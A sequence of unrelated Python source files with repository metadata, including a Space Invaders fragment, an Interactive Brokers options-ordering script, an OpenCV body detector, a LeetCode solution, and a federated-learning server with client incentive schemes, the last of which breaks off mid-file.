self.enemy[i].sprite_w / 2,\n self.enemy[i].coord_Y + self.enemy[i].sprite_h / 2,\n self.rocket.coord_X + self.rocket.sprite_w / 2, self.rocket.coord_Y):\n fire = False\n self.rocket.coord_X = self.player.coord_X + 
self.player.sprite_w / rockdiv + \\\n self.rocket.sprite_w / 2\n self.rocket.coord_Y = self.player.coord_Y + self.player.sprite_h / rockdiv\n self.enemy[i].set_random_coordinated(SCREEN_MARGIN,\n SCREEN_WIDTH - SCREEN_MARGIN - self.enemy[i].sprite_w - 1,\n 50, 150)\n self.score_value += self.enemy_fleet\n self.enemy_fleet += 1\n self.enemy.append(self.create_enemy())\n\n self.enemy[i].draw(self.screen)\n if render:\n self.rocket.draw(self.screen)\n self.player.draw(self.screen)\n else:\n self.game_over()\n self.set_text_info()\n\n pygame.display.update()\n self.clock.tick(120)\n","repo_name":"JohnCrabs/Space_Invader","sub_path":"space_invaders.py","file_name":"space_invaders.py","file_ext":"py","file_size_in_byte":8869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"15393251406","text":"from ibapi.client import EClient\nfrom ibapi.wrapper import EWrapper\nfrom ibapi.contract import Contract\nfrom ibapi.ticktype import TickTypeEnum\nfrom ibapi.order import *\n\nfrom threading import Timer\n\nimport yfinance as yf\n\nENV = \"prod\"\n\nport = {\n \"staging\": 7497,\n \"prod\": 7496\n }\n\nsymbol = \"SPY\"\nexpdate_glob = \"\"\nstrike_glob = 0\nct_size = 1\n\ndte = {\n \"SPX\": 0,\n \"SPY\": 2,\n \"TSLA\": 1,\n \"AAPL\": 0\n }\n\n\ndef symToYF(symbol):\n if symbol == \"SPX\":\n return \"^SPX\"\n return symbol\n\ndef updateGlobalVar(symbol, dtestep):\n global expdate_glob\n global strike_glob\n strike_glob = 0\n stock = yf.Ticker(symToYF(symbol))\n latest_price = stock.history(period='2d', interval='1m')['Close'][-1]\n basetime = stock.options[dtestep].replace('-', '') # get 3-5dte date\n\n expdate_glob = basetime\n\n for strike in stock.option_chain().calls['strike']:\n if(abs(strike - latest_price) < abs(strike_glob - latest_price)):\n strike_glob = strike\n\n print(\"Option Info: \" + symbol + \" \" + expdate_glob + \" \" + str(strike_glob))\n return\n\ndef printLastOptionInfo():\n print(\"Last Option 
Info: \" + symbol + \" \" + expdate_glob + \" \" + str(strike_glob))\n stock = yf.Ticker(symToYF(symbol))\n\n for i in range(6):\n print(\"dtestep = \" + str(i) + \"expdate: \" + stock.options[i].replace('-', ''))\n return\n\n\n\nclass OrderApp(EWrapper, EClient):\n optRight = \"C\"\n quantity = 1\n action = \"BUY\"\n\n def __init__(self):\n EClient.__init__(self, self)\n\n def __init__(self, optRight, quantity, action):\n EClient.__init__(self, self)\n self.optRight = optRight\n self.quantity = quantity\n self.action = action\n\n def tickPrice(self, reqId, tickType, price, attrib):\n print(\"Tick Price. Ticker Id:\", reqId, \"tickType:\", TickTypeEnum.to_str(tickType))\n\n def tickSize(self, reqId, tickType, size):\n print(\"Tick Size. Ticker Id:\", reqId, \"tickType\", TickTypeEnum.to_str(tickType), \"Size:\", size)\n\n def error(self, reqId, errorCode, errorString):\n print(\"Error: \", reqId, \" \", errorCode, \" \", errorString)\n\n def contractDetails(self, reqId, contractDetails):\n print(\"contractDetails: \", reqId, \" \", contractDetails)\n\n def historicalData(self, reqId, bar):\n print(\"HistoricalData. \", reqId, \"Date:\", bar.date, \"Open:\", bar.open, \"High:\", bar.high, \"Low:\", bar.low, \"Close:\", bar.close, \"Volume:\", bar.volume)\n\n def nextValidId(self, orderId):\n self.nextOrderId = orderId\n self.start()\n\n def orderStatus(self, orderId, status, filled, remaining, avgFillPrice, permId, parentId, lastFillPrice, clientId, whyHeld, mktCapPriceA):\n print(\"OrderStatus. Id: \", orderId, \", Status: \", status, \", Filled: \", filled, \",Remaining: \", remaining, \", LastFillPrice: \", lastFillPrice)\n\n def openOrder(self, orderId, contract, order, orderState):\n print(\"OpenOrder. ID:\", orderId, contract.symbol, contract.secType, \"@\", contract.exchange, \":\", order.action, order.orderType, order.totalQuantity, orderState.status)\n\n def execDetails(self, reqId, contract, execution):\n print(\"ExecDetails. 
\", reqId, contract.symbol, contract.secType, contract.currency, execution.execId, execution.orderId, execution.shares, execution.lastLiquidity)\n\n\n def start(self):\n global expdate_glob, strike_glob, symbol\n contract = Contract()\n contract.symbol = symbol\n contract.secType = \"OPT\"\n contract.exchange = \"SMART\"\n contract.currency = \"USD\"\n contract.lastTradeDateOrContractMonth = expdate_glob\n contract.strike = strike_glob\n contract.right = self.optRight\n contract.multiplier = \"100\"\n\n order = Order()\n order.action = self.action\n order.totalQuantity = self.quantity\n order.orderType = \"MKT\"\n order.eTradeOnly = ''\n order.firmQuoteOnly = ''\n\n\n self.placeOrder(self.nextOrderId, contract, order)\n\n def stop(self):\n self.done = True\n self.disconnect()\n\n\ndef run(optRight, ct_size, action):\n app = OrderApp(optRight, ct_size, action)\n app.nextOrderId = 0\n\n app.connect(\"127.0.0.1\", port[ENV], 0)\n\n\n #app.reqContractDetails(1, contract)\n #app.reqMarketDataType(4)\n #app.reqMktData(1, contract, \"\", False, False, [])\n #app.reqHistoricalData(1, contract, \"\", \"1 D\", \"1 min\", \"MIDPOINT\", 0, 1, False, [])\n\n Timer(3, app.stop).start()\n app.run()\n\nif __name__ == \"__main__\":\n updateGlobalVar(symbol, dte[symbol])\n while(True):\n print(\"ENV: \" + ENV)\n printLastOptionInfo()\n txt = \"\"\"\n Enter command: [TickerName | dte | [0-4] ]\n TickerName. (e.g SPX) Change Underlying Security \n dte. Update Stock DTE\n 0. Set Size\n 1. Buy Call\n 2. Buy Put\n 3. Sell Call\n 4. 
Sell Put\n \"\"\"\n print(txt)\n try:\n cmd = input()\n \n if cmd == '1':\n updateGlobalVar(symbol, dte[symbol])\n run(\"C\", ct_size, \"BUY\")\n elif cmd == '2':\n updateGlobalVar(symbol, dte[symbol])\n run(\"P\", ct_size, \"BUY\")\n elif cmd == '3':\n run(\"C\", ct_size, \"SELL\")\n elif cmd == '4':\n run(\"P\", ct_size, \"SELL\")\n elif cmd in dte.keys():\n symbol = cmd\n updateGlobalVar(symbol, dte[symbol])\n elif cmd == \"dte\":\n print(dte)\n ndte = int(input(\"select dte step: \"))\n dte[symbol] = ndte\n elif cmd == '0':\n ct_size = int(input(\"select size:\"))\n except Exception as e:\n print(e)\n","repo_name":"vuduclong0309/LongAndShortLite","sub_path":"src/bot/ibapi-tws/placeAtmOption.py","file_name":"placeAtmOption.py","file_ext":"py","file_size_in_byte":5776,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"33"} +{"seq_id":"17923008017","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 25 04:07:14 2020\r\nCSE 30 Spring 2020 Program 4 starter code\r\n@author: Fahim\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\n#Download the required files/sample videos from the Google Drive\r\ncascade1 = cv2.CascadeClassifier('haarcascade_fullbody.xml')\r\ncascade2 = cv2.CascadeClassifier('haarcascade_upperbody.xml')\r\ncascade3 = cv2.CascadeClassifier('haarcascade_lowerbody.xml')\r\n\r\ncap = cv2.VideoCapture(\"sample.webm\")\r\n#cap = cv2.VideoCapture(0)\r\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\r\nout = cv2.VideoWriter('output.avi',fourcc, 20.0, (640,480))\r\n\r\nwhile 1:\r\n ret, img = cap.read()\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\n body1 = cascade1.detectMultiScale(gray, 1.3, 5)\r\n body2 = cascade2.detectMultiScale(gray, 1.3, 5)\r\n body3 = cascade3.detectMultiScale(gray, 1.3, 5)\r\n\r\n for (x, y, w, h) in body1:\r\n cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2)\r\n\r\n for (x, y, w, h) in body2:\r\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 
2)\r\n\r\n\r\n for (x, y, w, h) in body3:\r\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 2)\r\n\r\n image = cv2.resize(img, (640,480))\r\n out.write(image)\r\n cv2.imshow('img', img)\r\n k = cv2.waitKey(30) & 0xff\r\n if k == 27:\r\n break\r\n\r\ncap.release()\r\nout.release()\r\ncv2.destroyAllWindows()","repo_name":"azsara/SIPCSE02","sub_path":"method2.py","file_name":"method2.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"9835482667","text":"def fun(d,n):\r\n s = 0\r\n a = sorted(d.values())\r\n # print(a)\r\n # for i in sorted(d.values()):\r\n # print(i)\r\n # s+=i\r\n # print(s)\r\n min1 = 99999999\r\n i = 0\r\n j = 3\r\n while (i <= (len(a) - 3) and j < len(a)):\r\n if (abs(a[i] - a[j]) <= min1):\r\n l = []\r\n min1 = abs(a[i] - a[j])\r\n p = i\r\n q = j\r\n i += 1\r\n j += 1\r\n # print(a[p:q+1])\r\n res = {}\r\n for i in d.keys():\r\n if d[i] in a[p:q + 1]:\r\n res[i] = d[i]\r\n print(str(res), min1)\r\n # s=\"Here the goodies that are selected for distribution are:\"+\"\\n\"+str(res)+\"\\n\"+\"And the diffrenece between the chossen goodie with highest price and the lowest price is\"+str(min1)\r\n # print(s)\r\n x=[]\r\n x.append(res)\r\n x.append(min1)\r\n return x\r\n\r\ndef display(d,diff):\r\n s = \"The goodies selected for distribution are:\" + \"\\n\" + \"\\n\"\r\n for i in d:\r\n s += i + \": \" + str(d[i]) + \"\\n\"\r\n s += \"\\n\" + \"And the difference between the chosen goodie with highest price and the lowest price is \" +str(diff)\r\n f=open(\"sample_output.txt\",\"w\")\r\n f.write(s)\r\n f.close()\r\n\r\n\r\nmyfile = open(\"sample_input.txt\",\"r\") #Opening file\r\na1=myfile.readline()\r\nn=int(a1[21]) #Number of emloyees\r\na1=myfile.readline()\r\na1=myfile.readline()\r\na1=myfile.readline()\r\n\r\nd={} #Extracting input values from file to dictionary\r\nfor i in range(10):\r\n a1=myfile.readline()\r\n a=a1.split(\": 
\")\r\n d[a[0]]=int(a[1])\r\nx=fun(d,n)\r\nd=x[0]\r\ndiff=x[1]\r\ndisplay(d,diff)\r\n","repo_name":"siddusk18/goodies.py-highpeak-code","sub_path":"siddu.py","file_name":"siddu.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"18204424963","text":"\"\"\"\nhttps://leetcode.com/explore/featured/card/april-leetcoding-challenge-2021/594/week-2-april-8th-april-14th/3707/\nhttps://leetcode.com/problems/partition-list/\n\nGiven the head of a linked list and a value x, partition it such that all nodes less than x come before nodes greater than or equal to x.\n\nYou should preserve the original relative order of the nodes in each of the two partitions.\n\n\n\nExample 1:\n\n\nInput: head = [1,4,3,2,5,2], x = 3\nOutput: [1,2,2,4,3,5]\nExample 2:\n\nInput: head = [2,1], x = 2\nOutput: [1,2]\n\n\nConstraints:\n\nThe number of nodes in the list is in the range [0, 200].\n-100 <= Node.val <= 100\n-200 <= x <= 200\n\"\"\"\nfrom Common.DataTypes.Leetcode import ListNode\nfrom Common.ObjectTestingUtils import run_functional_tests\nfrom Common.Helpers.TestParamsHelpers import convert_test_params_to_lists\n\n\n# Runtime: 32 ms, faster than 80.18% of Python3 online submissions for Partition List.\n# Memory Usage: 14.1 MB, less than 85.40% of Python3 online submissions for Partition List.\nclass Solution:\n def partition(self, head: ListNode, x: int) -> ListNode:\n i, j, i0, j0 = None, None, None, None\n while head:\n next = head.next\n if head.val < x:\n if not i0:\n i0 = head\n if i:\n i.next = head\n i = head\n else:\n if not j0:\n j0 = head\n if j:\n j.next = head\n j = head\n head = next\n if j:\n j.next = None\n if i:\n i.next = j0\n return i0 or j0\n\n\ntests = [\n [\n [1,4,3,2,5,2],\n 3,\n [1,2,2,4,3,5]\n ],\n [\n [2,1],\n 2,\n [1,2]\n ]\n]\n\n# print(list_length(build_list(tests[0][0])))\n# 
print(list_length(build_list(tests[1][0])))\n\nrun_functional_tests(Solution().partition, convert_test_params_to_lists(tests, [0, 2]))\n","repo_name":"wtain/LeetCodePython","sub_path":"DataStructures/Basic/Lists/PartitionList.py","file_name":"PartitionList.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"30996714763","text":"def avoid(words,letters):\n for l in words:\n if l not in letters:\n continue\n else:\n print (\"has avoided letters\")\n return False\n \n print (\"Words have no avoided letters\")\n return True\n\navoid(\"good\",\"aer\")\navoid(\"bedd\",\"aer\")\n\ndef avoids(letters):\n count=0\n new_list=list(letters)\n fin=open(\"words.txt\")\n for line in fin:\n words=line.strip()\n for letter in words:\n if not letter in new_list:\n print(letter)\n continue\n \n else:\n break\n\n print(words)\n \n #count=count+1\n #print (\"Number of words that don't contain avoided letters: \", count)\n\n \n#avoided_letters=input(\"Please type some avoided letters \\n\")\n#avoids(\"cd\")\n","repo_name":"catechnix/greentree","sub_path":"avoid.py","file_name":"avoid.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"10649000540","text":"import services as svc\n\nmessage = \"\"\n\n\ndef get_message(disconnected, client, my_turn, matrix):\n global message\n while True:\n if len(disconnected) == 1:\n break\n msg = svc.receive(client)\n event = svc.check_event_message(\n msg, client, my_turn, disconnected, matrix)\n if msg and not event:\n message = msg\n if len(matrix) < 1:\n print(f\"{msg}\\n\")\n print('\\n\\nDesconectado do servidor. 
Feche a página para sair.\\n')\n return\n\n\ndef get_current_message():\n global message\n return message\n","repo_name":"Tavress/Redes-I","sub_path":"Jogo-v3/Cliente/message_handler.py","file_name":"message_handler.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"17733505671","text":"from audioop import avg\nimport copy\nimport gc\nimport logging\nfrom pickletools import optimize\nimport random\n# from this import d\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom tqdm.auto import tqdm\nfrom collections import OrderedDict\nfrom .svfl.svfl import calculate_sv\nfrom .fifl.fifl import calculate_reward\nfrom .rrafl.rrafl import *\nfrom .models import *\nfrom .utils import *\nfrom .oort.oort import create_training_selector, create_testing_selector\nfrom .oort.clientSampler_oort import clientSampler_Oort\n\nlogger = logging.getLogger(__name__)\n\n\nclass Server(object):\n \"\"\"Each server class will instantiate required amount of clients needed to complete FL task.\n 1. init Server with config defined in config.yaml\n 2. Server to init weights to the choosen model and distribute it to all clients, Server selects some clients to contribute the model weight updates based on reputation\n 3. Communication round starts\n 4. Client to contribute their data (i.i.d or non-i.i.d)\n 5. (optional) Clients maybe malicious or simply honest or struggling\n 6. Server aggrgregates the weights based on FedAvg method\n \n Key Attributes:\n clients: List containing Client instances participating a federated learning.\n __round: Int for indcating the current federated round.\n writer: SummaryWriter instance to track a metric and a loss of the global model.\n model: torch.nn instance for a global model.\n seed: Int for random seed.\n device: Training machine indicator (e.g. 
\"cpu\", \"cuda\", \"mps\").\n data_path: Path to read data.\n dataset_name: Name of the dataset.\n num_shards: Number of shards for simulating non-IID data split (valid only when 'iid = False\").\n iid: Boolean Indicator of how to split dataset (IID or non-IID).\n init_config: kwargs for the initialization of the model.\n fraction: Ratio for the number of clients selected in each federated round.\n num_clients: Total number of participating clients.\n local_epochs: Epochs required for client model update.\n batch_size: Batch size for updating/evaluating a client/global model.\n criterion: torch.nn instance for calculating loss.\n optimizer: torch.optim instance for updating parameters.\n optim_config: Kwargs provided for optimizer.\n \"\"\"\n def __init__(self, id, writer, device, model_config={}, global_config={}, init_config={}, fed_config={}, optim_config={}, rep_config={}, bad_client_config={}, _clients=[], data_config={}, test_data=[], data_loader=None, V=1):\n self.id = id\n self.clients = _clients \n self.dataloader = data_loader\n self.data = test_data\n self._round = 0\n self.writer = writer\n self.device = device\n \n self.data_path = data_config[\"data_path\"]\n self.dataset_name = data_config[\"dataset_name\"]\n self.iid = data_config[\"iid\"] \n \n self.model = eval(model_config[\"name\"])(**model_config)\n self.seed = global_config[\"seed\"]\n self.global_grad = None\n \n self.num_clients = fed_config[\"K\"] #number of clients, irrelevant, set to 0\n self.fraction = fed_config[\"C\"] #Fraction of sampled clients to be used for aggregation, set to 1\n self.num_rounds = fed_config[\"R\"] #communication rounds\n self.local_epochs = fed_config[\"E\"] #number of epochs in device\n self.batch_size = fed_config[\"B\"] #batch size \n self._V = fed_config[\"V\"] #weight param for lyapunov\n self.multiplier_g = fed_config[\"multiplier_g\"]\n self.criterion = fed_config[\"criterion\"]\n self.incentive_type = fed_config[\"incentive\"]\n self.total_budget = 
fed_config[\"total_budget\"]\n self.exe_cost_per_client = fed_config[\"exe_cost_per_client\"]\n self.time_required = fed_config[\"time_required\"]\n self.init_config = init_config\n \n self.rep_threshold = rep_config['reputation_threshold']\n self.client_cost_per_data = rep_config['client_cost_per_data']\n \n self._Q = 0\n self.l2norm = 0\n self.hired_px_hist = []\n self.avg_price = 1\n self.opt_bid = 0\n self.total_bid = 0\n \n #dictionary; idx = client_idx, value = [rep, alpha, beta, most recent accuracy]\n self.client_rep_list = {}\n #for oort\n self.sampled_cliet_set = set()\n self.PR_budget = 0\n self.hire_budget = 0\n self.used_PR_budget = 0\n self.invoke_cost = 0\n\n # self.hire_count_prev = 0\n self.hire_count_now = 0\n \n # self.num_bad_clients = bad_client_config['bad_K'] # number of bad clients included in count for num_clients\n # self.client_attack = bad_client_config['attack']\n # self.client_attack_prop = bad_client_config['prop_attack']\n\n self.results = {\"loss\": [], \"accuracy\": []} \n self.utility_history = []\n self.PR_used_budget_hist = []\n self._Q_hist = []\n\n\n self.stale_threshold = 0\n self.staleness = 0\n self.learner_staleness = {l: 0 for l in range(self.num_clients)}\n self.learner_local_step = {l: 0 for l in range(self.num_clients)}\n self.learner_cache_step = {l: 0 for l in range(self.num_clients)}\n self.clock_factor = 1\n\n #clients on hold out \n self.pendingWorkers = {}\n self.exploredPendingWorkers = []\n self.virtualClientClock = {}\n self.avgUtilLastEpoch = 0.\n self.clientsLastEpoch = []\n self.sumDeltaWeights = []\n self.last_sampled_clients = None\n\n self.global_virtual_clock = 0.\n self.round_duration = 0.\n self.clock_factor = 1\n \n def setup(self, **init_kwargs):\n \"\"\"Set up all configuration for federated learning.\"\"\"\n # valid only before the very first round\n assert self._round == 0\n \n # initialize weights of the model\n torch.manual_seed(self.seed)\n init_net(self.model, self.device, **self.init_config, 
)\n\n message = f\"[Round: {str(self._round).zfill(4)}] ...successfully initialized model (# parameters: {str(sum(p.numel() for p in self.model.parameters()))})!\"\n print(message); logging.info(message)\n del message; gc.collect()\n self.transmit_model()\n # if self.incentive_type == \"Reverse\" or self.incentive_type == \"ReverseMod\":\n self.basic_PR_budget = self.total_budget / self.num_rounds\n self.PR_budget = self.basic_PR_budget\n\n if self.incentive_type == 'oort':\n self.oort_train_selector = create_training_selector()\n self.oort_test_selector = create_testing_selector()\n #simple init to feedback\n feedbacks = {'reward': 0, 'duration':0 , 'time_stamp':1, 'count': 0, 'status': True}\n #regist all clients first into the arms\n for client in self.clients:\n self.oort_train_selector.register_client(client.get_id(), feedbacks)\n\n def set_incentive_type(self, type):\n self.incentive_type = type\n\n #-------------------CLIENT RELATED FUNCTIONS-----------------------------------------------------\n \"\"\"Step 1.Select clients based on selected criteria\"\"\" \n def sample_clients(self, client_visit_arr, clients_bids): \n message = f\"[Server: {str(self.id)}, Round: {str(self._round).zfill(4)}] Select clients...!\"\n print(message); logging.info(message)\n del message; gc.collect()\n \n num_sampled_clients = max(int(self.fraction * (self.num_clients)), 1)\n sampled_client_indices = []\n \n #shuffle client rep list to visit clients randomly\n # if (len(self.client_rep_list) != 0):\n # self.client_rep_list = {k:self.client_rep_list[k] for k in random.sample(list(self.client_rep_list.keys()), len(self.client_rep_list))} \n # print(self.client_rep_list)\n\n # Sample clients based on their reputation from federation POV\n if (self._round >= 1):\n if self.incentive_type == \"SV\":\n total_asking_price = 0\n #build another list of clients that has higher rep than threshold\n for key in (client_visit_arr):\n if(key in self.client_rep_list.keys()):\n if 
(self.client_rep_list[key][0] >= self.rep_threshold):\n sampled_client_indices.append(key)\n self.clients[key].send_message([\"Accept\", self.cal_avg_price(), max(self.hired_px_hist)])\n total_asking_price += self.clients[key].get_asking_price() \n else:\n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), max(self.hired_px_hist)])\n sv = calculate_sv(sampled_client_indices, self.client_rep_list)\n #incentive based on contribution value\n temp_budget= sum(sv.values())*0.5*total_asking_price\n #normalize it such that it can be compared to other methods, x-xmin / xmax-xmin, xmin = 0.8 xmax =3\n self.used_PR_budget = (temp_budget-0.8) / 2.2\n elif self.incentive_type == \"Greedy\":\n #greedy only hires the lower 25% price of clients\n count = 0\n asking_px_arr = []\n for key in (client_visit_arr):\n asking_px_arr.append(self.clients[key].get_asking_price())\n cut_off_price = np.percentile(asking_px_arr, 15)\n for key in (client_visit_arr):\n #Check budget balance and reputation\n asking_px= self.clients[key].get_asking_price() \n # print(f'client {key} has price of {asking_px}') 24 is 40% of 60\n if(key in self.client_rep_list.keys() and count < 9):\n if (asking_px <= cut_off_price):\n self.used_PR_budget += asking_px\n #reply to clients\n self.hired_px_hist.append(asking_px)\n self.clients[key].send_message([\"Accept\", self.cal_avg_price(), max(self.hired_px_hist)])\n count += 1\n sampled_client_indices.append(key)\n else: \n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), max(self.hired_px_hist)])\n else:\n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), max(self.hired_px_hist)])\n elif self.incentive_type == \"FIFL\":\n #incentive based on update gradient\n for key in (client_visit_arr):\n self.clients[key].set_algo_type(\"FIFL\")\n curr_grad = self.clients[key].get_grad() \n #Check budget balance and reputation \n if(key in self.client_rep_list.keys()):\n if (self.client_rep_list[key][0] >= 
self.rep_threshold):\n incentive_px = calculate_reward(self.client_rep_list[key][0], 2, curr_grad, self.global_grad, client_visit_arr, self.clients)\n self.used_PR_budget += incentive_px\n #reply to clients\n self.hired_px_hist.append(incentive_px)\n self.clients[key].send_message([\"Accept\", self.cal_avg_price(), max(self.hired_px_hist)])\n sampled_client_indices.append(key)\n else: \n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), max(self.hired_px_hist)])\n else:\n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), max(self.hired_px_hist)])\n elif self.incentive_type == \"UCB\":\n #incentive based on update gradient\n for key in (client_visit_arr):\n self.clients[key].set_algo_type(\"UCB\") \n num_selected = self.clients[key].get_num_selected()\n #calculate UCB \n #Check budget balance and UCB \n if(key in self.client_rep_list.keys()):\n if (self.client_rep_list[key][0] >= self.rep_threshold):\n #calculate UCB \n #############################\n incentive_px = self.clients[key].get_price()\n #check if budget allow\n if (self.used_PR_budget + incentive_px ) <= self.basic_PR_budget: \n #reply to clients\n self.hired_px_hist.append(incentive_px)\n self.clients[key].send_message([\"Accept\", self.cal_avg_price(), max(self.hired_px_hist)])\n sampled_client_indices.append(key)\n else: \n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), max(self.hired_px_hist)])\n else:\n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), max(self.hired_px_hist)])\n elif self.incentive_type == \"RRAFL\":\n #get unit reputation bid \n rep_bid_dict = {}\n for key in (client_visit_arr):\n if(key in clients_bids.keys()):\n self.clients[key].set_algo_type(\"RRAFL\")\n asking_px = self.clients[key].get_asking_price()\n q_client = asking_px/self.client_rep_list[key][0]\n rep_bid_dict[key] = q_client\n # sort by value\n sorted_rep_bid_list= sorted(rep_bid_dict.items(), key=lambda x:x[1])\n #convert to dict\n 
sorted_rep_bid_dict = dict(sorted_rep_bid_list)\n\n #find the selected group, all temp variables\n for key in (sorted_rep_bid_dict.keys()): \n if key+1 >= len(sorted_rep_bid_dict):\n q_client_next = self.clients[key].get_asking_price() / self.client_rep_list[key][0]\n else:\n #use next unit price \n q_client_next = self.clients[key+1].get_asking_price() / self.client_rep_list[key][0]\n incentive_px = self.client_rep_list[key][0] * q_client_next + self.exe_cost_per_client\n if(self.used_PR_budget + incentive_px <= self.PR_budget):\n self.used_PR_budget = self.used_PR_budget + incentive_px\n #bookeeping\n sampled_client_indices.append(key)\n self.hired_px_hist.append(incentive_px)\n self.clients[key].send_message([\"Accept\", self.cal_avg_price(), min(self.hired_px_hist)])\n else:\n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), min(self.hired_px_hist)])\n elif self.incentive_type == \"Uniform\":\n for key in (client_visit_arr):\n #Check budget balance and reputation\n asking_px= self.clients[key].get_asking_price() \n # print(f'client {key} has price of {asking_px}')\n if(key in self.client_rep_list.keys()):\n if (self.client_rep_list[key][0] >= self.rep_threshold):\n self.used_PR_budget += asking_px\n #reply to clients\n self.hired_px_hist.append(asking_px) \n self.clients[key].send_message([\"Accept\", self.cal_avg_price(), max(self.hired_px_hist)])\n sampled_client_indices.append(key)\n else: \n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), max(self.hired_px_hist)])\n else:\n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), max(self.hired_px_hist)])\n elif self.incentive_type == \"Vanilla\": #vanilla reverse auction\n min_bid = min(clients_bids, key=clients_bids.get)\n for key in (client_visit_arr):\n #first come first serve if many low bidders, don't want to starve if only pick high rep\n if(key in clients_bids.keys()):\n asking_px = self.clients[key].get_asking_price()\n #if pariticpant has the lowest 
bid and budget allows\n incentive_px = asking_px + self.exe_cost_per_client\n if (asking_px == clients_bids[min_bid]) and ( (self.used_PR_budget + incentive_px ) <= self.basic_PR_budget) : \n self.hired_px_hist.append(asking_px) \n self.used_PR_budget += incentive_px\n if len(self.hired_px_hist) == 0:\n self.clients[key].send_message([\"Accept\", self.cal_avg_price(), 3])\n else:\n self.clients[key].send_message([\"Accept\", self.cal_avg_price(), min(self.hired_px_hist)])\n sampled_client_indices.append(key)\n #reject participant\n else:\n #no previous participants\n if len(self.hired_px_hist) == 0:\n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), 3])\n else:\n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), min(self.hired_px_hist)])\n #normal reverse auction with no boosted income, select only the cheapest participants \n elif self.incentive_type == \"Reverse\":\n min_bid = min(clients_bids, key=clients_bids.get)\n print(\"min bid is \", clients_bids[min_bid])\n for key in (client_visit_arr):\n #first come first serve if many low bidders, don't want to starve if only pick high rep\n if(key in clients_bids.keys()):\n asking_px = self.clients[key].get_asking_price()\n #if pariticpant has the lowest bid and budget allows\n incentive_px = asking_px + self.exe_cost_per_client\n if (asking_px == clients_bids[min_bid]) and ( (self.used_PR_budget + incentive_px ) <= self.basic_PR_budget) : \n self.hired_px_hist.append(asking_px) \n self.used_PR_budget += incentive_px\n if len(self.hired_px_hist) == 0:\n self.clients[key].send_message([\"Accept\", self.cal_avg_price(), 3])\n else:\n self.clients[key].send_message([\"Accept\", self.cal_avg_price(), min(self.hired_px_hist)])\n sampled_client_indices.append(key)\n #reject participant\n else:\n #no previous participants\n if len(self.hired_px_hist) == 0:\n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), 3])\n else:\n self.clients[key].send_message([\"Decline\", 
self.cal_avg_price(), min(self.hired_px_hist)])\n #reverse auction mechanism but federation have more expenditure budget\n elif self.incentive_type == \"ReverseMod\":\n #shortcut to optimize code\n if self.hire_budget <= 0:\n sampled_client_indices = []\n return sampled_client_indices\n for key in (client_visit_arr):\n if(key in clients_bids.keys()):\n asking_px = self.clients[key].get_asking_price() \n incentive_px = asking_px + self.exe_cost_per_client\n if(key in self.client_rep_list.keys()):\n if (self.hire_budget -incentive_px >= 0) and (self.client_rep_list[key][0] >= self.rep_threshold) : \n self.hired_px_hist.append(asking_px) \n self.hire_budget = self.hire_budget - incentive_px\n # for bookkepping of values\n self.used_PR_budget = self.used_PR_budget + asking_px + self.exe_cost_per_client\n if len(self.hired_px_hist) == 0:\n self.clients[key].send_message([\"Accept\", self.cal_avg_price(), 3])\n else:\n self.clients[key].send_message([\"Accept\", self.cal_avg_price(), min(self.hired_px_hist)])\n sampled_client_indices.append(key)\n else:\n if len(self.hired_px_hist) == 0:\n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), 3])\n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), min(self.hired_px_hist)])\n elif self.incentive_type == \"oort\": \n #Select clients with pacer, the function takes care of the 2 exploitation method and the exploration by speed\n sampled_client_indices = self.oort_train_selector.select_participant(len(client_visit_arr))\n total_per_round_asking_price = 0\n for client_idx in client_visit_arr:\n if client_idx in sampled_client_indices:\n #the price dont actually matter here. 
